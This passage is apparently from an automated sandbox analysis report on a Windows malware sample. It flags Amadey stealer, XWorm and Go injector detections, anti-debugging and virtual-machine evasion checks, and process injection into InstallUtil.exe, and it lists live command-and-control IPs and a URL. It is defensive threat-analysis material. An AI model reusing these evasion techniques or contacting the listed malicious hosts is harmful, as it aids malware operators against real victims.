Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5224 Thread sleep count: 64 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5224 Thread sleep time: -128064s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6632 Thread sleep count: 61 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6632 Thread sleep time: -122061s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5056 Thread sleep count: 81 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5056 Thread sleep time: -2430000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5656 Thread sleep count: 59 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5656 Thread sleep time: -118059s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6652 Thread sleep count: 66 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6652 Thread sleep time: -132066s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6592 Thread sleep count: 3326 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6592 Thread sleep time: -6655326s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4912 Thread sleep count: 3304 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4912 Thread sleep time: -6611304s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4912 Thread sleep count: 482 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4912 Thread sleep time: -964482s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6592 Thread sleep count: 742 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6592 Thread sleep time: -1484742s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe TID: 3280 Thread sleep count: 380 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe TID: 2080 Thread sleep count: 195 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: axplong.exe, axplong.exe, 00000009.00000002.2683241167.00000000003EA000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000009.00000002.2685071970.0000000001168000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: file.exe, 00000000.00000003.1432101499.00000000015AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002591000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002591000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: file.exe, 00000000.00000002.1459778407.0000000000A4A000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1492793445.00000000003EA000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.1497074934.00000000003EA000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000009.00000002.2683241167.00000000003EA000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: rstxdhuj.exe, 0000000A.00000002.2004112180.00000000005E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053D0CFC rdtsc 0_2_053D0CFC
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0023645B mov eax, dword ptr fs:[00000030h] 9_2_0023645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0023A1C2 mov eax, dword ptr fs:[00000030h] 9_2_0023A1C2
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42C000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C8A008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: axplong.exe, axplong.exe, 00000009.00000002.2683241167.00000000003EA000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: V+Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0021D312 cpuid 9_2_0021D312
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0021CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 9_2_0021CB1A
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 2.2.axplong.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.axplong.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.axplong.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1419233067.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1492718089.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1449387719.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1496999344.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1459683482.0000000000861000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2682988440.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1953487014.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1456183311.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Go Injector
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000343001\5.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\5[1].exe, type: DROPPED
Yara detected XWorm
Source: Yara match File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rstxdhuj.exe.365fdb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rstxdhuj.exe.3611590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.2669149156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2005733540.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rstxdhuj.exe PID: 2156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4684, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Go Injector
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000343001\5.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\5[1].exe, type: DROPPED
Yara detected XWorm
Source: Yara match File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rstxdhuj.exe.365fdb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rstxdhuj.exe.3611590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.2669149156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2005733540.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rstxdhuj.exe PID: 2156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4684, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1517696 Sample: file.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 43 google.com 2->43 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 17 other signatures 2->73 9 file.exe 5 2->9         started        13 axplong.exe 19 2->13         started        16 axplong.exe 2->16         started        signatures3 process4 dnsIp5 31 C:\Users\user\AppData\Local\...\axplong.exe, PE32 9->31 dropped 33 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 9->33 dropped 75 Detected unpacking (changes PE section rights) 9->75 77 Tries to evade debugger and weak emulator (self modifying code) 9->77 79 Tries to detect virtualization through RDTSC time measurements 9->79 18 axplong.exe 9->18         started        47 185.215.113.16, 49709, 49710, 80 WHOLESALECONNECTIONSNL Portugal 13->47 49 103.130.147.211, 49711, 80 MYREPUBLIC-AS-IDPTEkaMasRepublikID Turkey 13->49 35 C:\Users\user\AppData\Local\Temp\...\5.exe, PE32+ 13->35 dropped 37 C:\Users\user\AppData\Local\...\rstxdhuj.exe, PE32 13->37 dropped 39 C:\Users\user\AppData\Local\...\5[1].exe, PE32+ 13->39 dropped 41 C:\Users\user\AppData\...\rstxdhuj[1].exe, PE32 13->41 dropped 81 Hides threads from debuggers 13->81 83 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->83 85 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 13->85 21 rstxdhuj.exe 1 3 13->21         started        file6 signatures7 process8 dnsIp9 51 Antivirus detection for dropped file 18->51 53 Multi AV Scanner detection for dropped file 18->53 55 Detected unpacking (changes PE section rights) 18->55 65 5 other signatures 18->65 45 google.com 142.250.186.46 GOOGLEUS United States 21->45 29 C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe, PE32 21->29 dropped 57 Machine Learning detection for dropped file 21->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 21->59 61 Writes to foreign memory regions 21->61 63 Injects a PE file into a foreign processes 21->63 25 InstallUtil.exe 21->25         started        file10 signatures11 process12 process13 27 WerFault.exe 4 25->27         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.186.46
 google.com United States
15169 GOOGLEUS false
103.130.147.211
 unknown Turkey
63859 MYREPUBLIC-AS-IDPTEkaMasRepublikID true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted Domains

Name IP Active
google.com 142.250.186.46 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.16/Jo89Ku7d/index.php true
  • Avira URL Cloud: phishing
 unknown